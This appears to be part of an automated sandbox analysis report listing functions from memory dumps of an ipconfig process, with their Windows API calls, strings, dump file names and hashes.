Function 00C74B41 Relevance: 10.6, APIs: 7, Instructions: 53COMMON

Download Yara Rule

APIs

_fileno.MSVCRT ref: 00C74B4C
_get_osfhandle.MSVCRT ref: 00C74B53
GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,0000054F,00000000,00002908), ref: 00C74B69
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00C74B75
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00C74B7F

Memory Dump Source

Source File: 00000007.00000002.3825630510.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000007.00000002.3825630510.0000000000C77000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c70000_ipconfig.jbxd

Similarity

API ID: ErrorLast$FileType_fileno_get_osfhandle
String ID:
API String ID: 3475475711-0
Opcode ID: 2a6bd4042213c3de684badb386f3ede19010ce95e187a98659d84c895f396679
Instruction ID: f8b20a44de70550dee966a9eaa086f8a8a3f1dee7aa148aa233dfd41b1114545
Opcode Fuzzy Hash: 2a6bd4042213c3de684badb386f3ede19010ce95e187a98659d84c895f396679
Instruction Fuzzy Hash: 9901D633608604AF97295BB66C48F7F3AEDD7813B13244665E92EC2190EB30CD80D6A0

Uniqueness

Uniqueness Score: -1.00%

Function 02D86940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3826243110.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000007.00000002.3826243110.0000000002DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3826243110.0000000002DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3826243110.0000000002E1E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c80000_ipconfig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
Instruction ID: 42c46ed0b63c3f566711526347ee1204c57c3b38f362afd3a0c0e504e69e22f3
Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
Instruction Fuzzy Hash: 53023771508341AFD345EF28C490A6BBBEAEFC4714F14896DF9954B364DB31E904CB92

Uniqueness

Uniqueness Score: -1.00%

Function 02CFB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 02CFB6BF

Strings

+, xrefs: 02CFB65A
-, xrefs: 02CFB650
0, xrefs: 02CFB695
0, xrefs: 02CFB66F

Memory Dump Source

Source File: 00000007.00000002.3826243110.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000007.00000002.3826243110.0000000002DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3826243110.0000000002DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3826243110.0000000002E1E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c80000_ipconfig.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: 9ed70324083fa7724ee9d2b020aacf5c990d709df583b1f7e853e161f86c84c7
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: BA81B370E452499EDFE88E68C8517FEBBB2AF8D35CF18411ADA51A7290C7349E40CB60

Uniqueness

Uniqueness Score: -1.00%

Function 02D620E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 02D6214F
___swprintf_l.LIBCMT ref: 02D62172

Strings

[, xrefs: 02D6212B
]:%u, xrefs: 02D62169
%%%u, xrefs: 02D62146

Memory Dump Source

Source File: 00000007.00000002.3826243110.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000007.00000002.3826243110.0000000002DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3826243110.0000000002DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3826243110.0000000002E1E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c80000_ipconfig.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: f2b637282085ba251dcbe9747c0ffbe313edfa24dd9788f0b97974847d9020c3
Instruction ID: b4e2f88dadb5c2cc96d4ad91c589fd72f9f062fe2c3cc7bac0469a6a18385f31
Opcode Fuzzy Hash: f2b637282085ba251dcbe9747c0ffbe313edfa24dd9788f0b97974847d9020c3
Instruction Fuzzy Hash: 05212C76E00119ABDB10DE69D858AFEBBE9EF54744F440126ED45E3340E734DA01DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C72003 Relevance: 7.6, APIs: 5, Instructions: 150memoryCOMMON

Download Yara Rule

APIs

ConvertInterfaceLuidToNameW.IPHLPAPI(?,?,00000020), ref: 00C72054
DhcpEnumClasses.DHCPCSVC(00000000,?,?,00000000), ref: 00C72071
LocalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,?), ref: 00C720AC
DhcpEnumClasses.DHCPCSVC(00000000,?,?,00000000), ref: 00C720CC
LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 00C7214C

Memory Dump Source

Source File: 00000007.00000002.3825630510.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000007.00000002.3825630510.0000000000C77000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c70000_ipconfig.jbxd

Similarity

API ID: ClassesDhcpEnumLocal$AllocConvertFreeInterfaceLuidName
String ID:
API String ID: 3187720636-0
Opcode ID: a003c6159397bb7cd1cda322f1d8c125066102ee289e53ae1d4c0d73e075a23a
Instruction ID: a7dcfc784404cfc192c6e7bb77d7492a5a9109bec56687511e8851fb09746409
Opcode Fuzzy Hash: a003c6159397bb7cd1cda322f1d8c125066102ee289e53ae1d4c0d73e075a23a
Instruction Fuzzy Hash: 6B419472E00208AFDB14AFE4DC85BAEB779FF44710F548129FA1DAB281DBB09D449790

Uniqueness

Uniqueness Score: -1.00%

Function 00C74634 Relevance: 7.6, APIs: 5, Instructions: 78threadmemoryCOMMON

Download Yara Rule

APIs

GetCurrentThreadCompartmentId.IPHLPAPI ref: 00C74641

Part of subcall function 00C75769: __iob_func.MSVCRT ref: 00C7576E

Part of subcall function 00C74E6F: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000900,?,00000000,?,00000000,?,00000001,00000001,?,00C71EB0,00000000,00002908), ref: 00C74E96
Part of subcall function 00C74E6F: LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,00C71EB0,00000000,00002908), ref: 00C74EAE

NsiAllocateAndGetTable.NSI(00000001,00C71350,00000007,?,00000004,?,00000668,00000000,00000000,00000000,00000000,?,00000001), ref: 00C7468B
SetCurrentThreadCompartmentId.IPHLPAPI(?), ref: 00C746A7
SetCurrentThreadCompartmentId.IPHLPAPI(00000000), ref: 00C746DF
NsiFreeTable.NSI(?,?,00000000,00000000), ref: 00C746ED

Memory Dump Source

Source File: 00000007.00000002.3825630510.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000007.00000002.3825630510.0000000000C77000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c70000_ipconfig.jbxd

Similarity

API ID: CompartmentCurrentThread$FreeTable$AllocateFormatLocalMessage__iob_func
String ID:
API String ID: 4019950967-0
Opcode ID: 51573e53a62b5008a1a4a07d90b465ac4c320beb12437d70f6f3e42b1a4ea6cb
Instruction ID: 7876db6a00028e6b3cba0f7e0a69d8e651254ed0295d33de363826327e72fed6
Opcode Fuzzy Hash: 51573e53a62b5008a1a4a07d90b465ac4c320beb12437d70f6f3e42b1a4ea6cb
Instruction Fuzzy Hash: F911B431A00218BFDB246BE1DC0AFAF7F68EF42B50F004054F61CAB091DBB19A45DAA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C73096 Relevance: 7.6, APIs: 5, Instructions: 61timeCOMMON

Download Yara Rule

APIs

FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 00C730B1
FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?,?,?), ref: 00C730BF
GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000400,00000002,?,00000000,?,00000080,?,?), ref: 00C730D9
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000080,?,?), ref: 00C730E5

Memory Dump Source

Source File: 00000007.00000002.3825630510.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000007.00000002.3825630510.0000000000C77000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c70000_ipconfig.jbxd

Similarity

API ID: Time$File$DateErrorFormatLastLocalSystem
String ID:
API String ID: 1951311907-0
Opcode ID: 95e3e16ea37ca7efbace8635438b7e8c1a80822e279fe8d54c191b3488120e7a
Instruction ID: b6f5b49a1460a6cae3cf5ced07690f5e20250465a3b698c823a1326329b0ccbf
Opcode Fuzzy Hash: 95e3e16ea37ca7efbace8635438b7e8c1a80822e279fe8d54c191b3488120e7a
Instruction Fuzzy Hash: 0711A172604209AFEB249B659C0AFFF7BBCEB44750F404136F60AE61C0DA7099858BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00C75615 Relevance: 7.6, APIs: 5, Instructions: 50timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000000), ref: 00C75642
GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00C75651
GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00C7565A
GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00C75663
QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?), ref: 00C75678

Memory Dump Source

Source File: 00000007.00000002.3825630510.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000007.00000002.3825630510.0000000000C77000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c70000_ipconfig.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: be1112bdb193a81a5a54b586381b071a761be4652ae00e04b79bfc6311b94cbd
Instruction ID: 35aa5b9865d8a92f55b6fe7eb7041be7fc7d6ada7bf09806f2fe592c2f32cdda
Opcode Fuzzy Hash: be1112bdb193a81a5a54b586381b071a761be4652ae00e04b79bfc6311b94cbd
Instruction Fuzzy Hash: 211118B5D05608EFCB10DBB8DA4879EBBF5FF58310FA18969E40AE7210E7709B408B44

Uniqueness

Uniqueness Score: -1.00%

Function 02CDF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 02D2031E
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02D202E7
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02D202BD

Memory Dump Source

Source File: 00000007.00000002.3826243110.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000007.00000002.3826243110.0000000002DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3826243110.0000000002DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3826243110.0000000002E1E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c80000_ipconfig.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 74c85d15eb41c4a374a9ee8b913f8e87e2a103ec60a111436aefcfe76199d14a
Instruction ID: e1454f57fdd5a74d222ef3d3bfed9b3ef614c5826ed7344300ee2be30bedce93
Opcode Fuzzy Hash: 74c85d15eb41c4a374a9ee8b913f8e87e2a103ec60a111436aefcfe76199d14a
Instruction Fuzzy Hash: BEE1DD306087419FD725CF28C884B2AB7E1BF94318F144A6DF6A68BBE0D774D949CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02CEBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 02D27BAC
RTL: Resource at %p, xrefs: 02D27B8E
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 02D27B7F

Memory Dump Source

Source File: 00000007.00000002.3826243110.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000007.00000002.3826243110.0000000002DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3826243110.0000000002DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3826243110.0000000002E1E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c80000_ipconfig.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: 2e2ec36358651bec4fbf9619b24eddd8a36c8f2029f2df96ab6367c14c7a9c85
Instruction ID: 96648ec9fd63dae446c7cbd9931fe3bfad1966ad538874edd48ea3f7ac14d394
Opcode Fuzzy Hash: 2e2ec36358651bec4fbf9619b24eddd8a36c8f2029f2df96ab6367c14c7a9c85
Instruction Fuzzy Hash: 9141AC357017429BDB24DA25C840B6AB7E5FB88718F100A2DE95ADB780DB31ED05CB92

Uniqueness

Uniqueness Score: -1.00%

Function 02CEB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02D2728C

Strings

RTL: Re-Waiting, xrefs: 02D272C1
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 02D27294
RTL: Resource at %p, xrefs: 02D272A3

Memory Dump Source

Source File: 00000007.00000002.3826243110.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000007.00000002.3826243110.0000000002DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3826243110.0000000002DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3826243110.0000000002E1E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c80000_ipconfig.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 54e8b6c78dd9941dda6535673561e8ef8279b4249ada17b2714c75e76e737eb5
Instruction ID: cc8b3271c152bb9c6619173d214055461750a338aa0cb3361b5db0a3f95b7222
Opcode Fuzzy Hash: 54e8b6c78dd9941dda6535673561e8ef8279b4249ada17b2714c75e76e737eb5
Instruction Fuzzy Hash: 04410131700216ABEB21CE25CC41B66B7A5FFA4718F108618F956DB340DB20EC56CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 02D62300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 02D6238D
___swprintf_l.LIBCMT ref: 02D623B3

Strings

]:%u, xrefs: 02D623AA
%%%u, xrefs: 02D62384

Memory Dump Source

Source File: 00000007.00000002.3826243110.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000007.00000002.3826243110.0000000002DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3826243110.0000000002DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3826243110.0000000002E1E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c80000_ipconfig.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 17a8719e6118ae17e003e4016fa91384b30e54ae7812d8ddb2d02ad22404d5e4
Instruction ID: bf3e5eae127de39472d7c16e48dfece91e30b4d0b60541aa377ea62f4ad3afbd
Opcode Fuzzy Hash: 17a8719e6118ae17e003e4016fa91384b30e54ae7812d8ddb2d02ad22404d5e4
Instruction Fuzzy Hash: 28314372A002199FDB60DE29CC58BFE77A9EB44754F44455AEC89E3240EB30AE55CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C72B49 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56registryCOMMON

Download Yara Rule

APIs

ConvertInterfaceLuidToGuid.IPHLPAPI(?,?), ref: 00C72B76
ConvertGuidToStringW.IPHLPAPI(?,?,00000027), ref: 00C72B8D

Part of subcall function 00C72C01: memset.MSVCRT ref: 00C72C2B
Part of subcall function 00C72C01: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,?,00000000,?,00C72BA8,?,00000000,SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters\Interfaces\,00000200), ref: 00C72C80

RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,Dhcpv6ClassId,00000000,?,?,00000200,00000001,?), ref: 00C72BCE

Part of subcall function 00C75769: __iob_func.MSVCRT ref: 00C7576E

Part of subcall function 00C74E6F: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000900,?,00000000,?,00000000,?,00000001,00000001,?,00C71EB0,00000000,00002908), ref: 00C74E96
Part of subcall function 00C74E6F: LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,00C71EB0,00000000,00002908), ref: 00C74EAE

Strings

Dhcpv6ClassId, xrefs: 00C72BC3

Memory Dump Source

Source File: 00000007.00000002.3825630510.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000007.00000002.3825630510.0000000000C77000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c70000_ipconfig.jbxd

Similarity

API ID: ConvertGuid$FormatFreeInterfaceLocalLuidMessageOpenQueryStringValue__iob_funcmemset
String ID: Dhcpv6ClassId
API String ID: 2135874933-1235502083
Opcode ID: 9b308244946182979c71fd51412c39d9f7dd457993febfee7adbbad1c1ba0d75
Instruction ID: ec95f0224617146f65892f33ea384fafe6b4efaf302010ce4a26369e89ef137d
Opcode Fuzzy Hash: 9b308244946182979c71fd51412c39d9f7dd457993febfee7adbbad1c1ba0d75
Instruction Fuzzy Hash: A011FE71A0420CABDB20DFA1CD8DFEE77BCAB14704F4041A5A50EE6190EB71AB899B54

Uniqueness

Uniqueness Score: -1.00%

Function 00C721A8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56registryCOMMON

Download Yara Rule

APIs

ConvertInterfaceLuidToGuid.IPHLPAPI(?,?), ref: 00C721D5
ConvertGuidToStringW.IPHLPAPI(?,?,00000027), ref: 00C721EC

Part of subcall function 00C72260: memset.MSVCRT ref: 00C7228A
Part of subcall function 00C72260: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,?,00000000,?,00C72207,?,00000000,SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\,00000200), ref: 00C722DF

RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DhcpClassId,00000000,?,?,00000200,00000001,?), ref: 00C7222D

Part of subcall function 00C75769: __iob_func.MSVCRT ref: 00C7576E

Part of subcall function 00C74E6F: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000900,?,00000000,?,00000000,?,00000001,00000001,?,00C71EB0,00000000,00002908), ref: 00C74E96
Part of subcall function 00C74E6F: LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,00C71EB0,00000000,00002908), ref: 00C74EAE

Strings

DhcpClassId, xrefs: 00C72222

Memory Dump Source

Source File: 00000007.00000002.3825630510.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000007.00000002.3825630510.0000000000C77000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c70000_ipconfig.jbxd

Similarity

API ID: ConvertGuid$FormatFreeInterfaceLocalLuidMessageOpenQueryStringValue__iob_funcmemset
String ID: DhcpClassId
API String ID: 2135874933-3964061114
Opcode ID: 8009567a506669722648ba0633484dfb896c788282ef7b1dd52cb74a4a12384c
Instruction ID: cf3c269ac48681a7d50638f04e49d225b51d490d6a6d28922b99d94b3d76e3e5
Opcode Fuzzy Hash: 8009567a506669722648ba0633484dfb896c788282ef7b1dd52cb74a4a12384c
Instruction Fuzzy Hash: 4E112E71A0420CABDB10EFA1CD8DFEEB7BCAB44704F5081A5A51DE6091EB71DA898F50

Uniqueness

Uniqueness Score: -1.00%

Function 00C72260 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54registryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00C7228A
RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,?,00000000,?,00C72207,?,00000000,SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\,00000200), ref: 00C722DF

Strings

SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\, xrefs: 00C72291
0mduPIdu, xrefs: 00C722DF

Memory Dump Source

Source File: 00000007.00000002.3825630510.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000007.00000002.3825630510.0000000000C77000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c70000_ipconfig.jbxd

Similarity

API ID: Openmemset
String ID: 0mduPIdu$SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\
API String ID: 180050240-2801144683
Opcode ID: 103c4344b9a2f19fe6016db0939931ca8ab9c1c8b66ea0b89926a95df423a8e5
Instruction ID: d4478f91f8884430a6423061238947e64cb4385dea0950a92591479c96005c4a
Opcode Fuzzy Hash: 103c4344b9a2f19fe6016db0939931ca8ab9c1c8b66ea0b89926a95df423a8e5
Instruction Fuzzy Hash: 7001D8B2610218ABE714EB15DC0BFBE73ACEB54714F508065F90DDA1C2DA70EE44D664

Uniqueness

Uniqueness Score: -1.00%

Function 00C72C01 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54registryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00C72C2B
RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,?,00000000,?,00C72BA8,?,00000000,SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters\Interfaces\,00000200), ref: 00C72C80

Strings

SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters\Interfaces\, xrefs: 00C72C32
0mduPIdu, xrefs: 00C72C80

Memory Dump Source

Source File: 00000007.00000002.3825630510.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000007.00000002.3825630510.0000000000C77000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c70000_ipconfig.jbxd

Similarity

API ID: Openmemset
String ID: 0mduPIdu$SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters\Interfaces\
API String ID: 180050240-344641710
Opcode ID: e4507b15bcc9ae6e0a111f50382968473da7512f6eab8124f128e432a3346948
Instruction ID: 3fad68046266544932ee7511d765b143bfc2ac3891e42bf3a15f8108eeac5367
Opcode Fuzzy Hash: e4507b15bcc9ae6e0a111f50382968473da7512f6eab8124f128e432a3346948
Instruction Fuzzy Hash: 6501D8B2600219ABF714EB25DD0BFAE73ACEB50714F50C165F90DEA1C1DA70EE448A64

Uniqueness

Uniqueness Score: -1.00%

Function 00C71D1D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(dhcpcsvc.dll,00000000,00000000,00C72577,00000001), ref: 00C71D26
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,DhcpIsEnabled), ref: 00C71D3B

Strings

DhcpIsEnabled, xrefs: 00C71D35
dhcpcsvc.dll, xrefs: 00C71D21

Memory Dump Source

Source File: 00000007.00000002.3825630510.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000007.00000002.3825630510.0000000000C77000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c70000_ipconfig.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: DhcpIsEnabled$dhcpcsvc.dll
API String ID: 2574300362-2583171064
Opcode ID: 1f76e5a9ad04a4d7a294fb817ba3050ff7e7bb2ac28aa1ba612ecd9503185a6d
Instruction ID: aed7db521d857eea3347111a8d19877daa7b385a3a8a6da3250ba15d097f530a
Opcode Fuzzy Hash: 1f76e5a9ad04a4d7a294fb817ba3050ff7e7bb2ac28aa1ba612ecd9503185a6d
Instruction Fuzzy Hash: 11D0A734240B03EADB211B3A5C19B5F3AA47720B81F488060FC2CDA2F0DA70C040DE31

Uniqueness

Uniqueness Score: -1.00%

Function 00C72749 Relevance: 6.1, APIs: 4, Instructions: 117COMMON

Download Yara Rule

APIs

ConvertInterfaceLuidToNameW.IPHLPAPI(?,00000002,00000020), ref: 00C727D1
NsiSetAllParameters.NSI(00000001,00000005,00C71368,00000019,?,00000008,00000000,00000000), ref: 00C727ED
Dhcpv6IsEnabled.DHCPCSVC6(00000002,?), ref: 00C72801
Dhcpv6AcquireParameters.DHCPCSVC6(00000002), ref: 00C72817

Part of subcall function 00C75769: __iob_func.MSVCRT ref: 00C7576E

Part of subcall function 00C74E6F: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000900,?,00000000,?,00000000,?,00000001,00000001,?,00C71EB0,00000000,00002908), ref: 00C74E96
Part of subcall function 00C74E6F: LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,00C71EB0,00000000,00002908), ref: 00C74EAE

Memory Dump Source

Source File: 00000007.00000002.3825630510.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000007.00000002.3825630510.0000000000C77000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c70000_ipconfig.jbxd

Similarity

API ID: Dhcpv6Parameters$AcquireConvertEnabledFormatFreeInterfaceLocalLuidMessageName__iob_func
String ID:
API String ID: 1181060623-0
Opcode ID: 7f543f918edc3442fc520b43ea18ef9c226b440abf1b58b00ecc750682969e4f
Instruction ID: 610bc594abee36f385d78c9daecb464985297bbebfcc966a03d9424f7717bc98
Opcode Fuzzy Hash: 7f543f918edc3442fc520b43ea18ef9c226b440abf1b58b00ecc750682969e4f
Instruction Fuzzy Hash: 76312A32A007089FDB209BA5CC85BAFB3B9FF54710F148029ED6EA72D1DBB1ED058611

Uniqueness

Uniqueness Score: -1.00%

Function 00C74EC0 Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

Part of subcall function 00C75478: GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 00C7547F

__set_app_type.MSVCRT ref: 00C74ED2
__p__fmode.MSVCRT ref: 00C74EE8
__p__commode.MSVCRT ref: 00C74EF6
__setusermatherr.MSVCRT ref: 00C74F17

Memory Dump Source

Source File: 00000007.00000002.3825630510.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000007.00000002.3825630510.0000000000C77000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c70000_ipconfig.jbxd

Similarity

API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
String ID:
API String ID: 1632413811-0
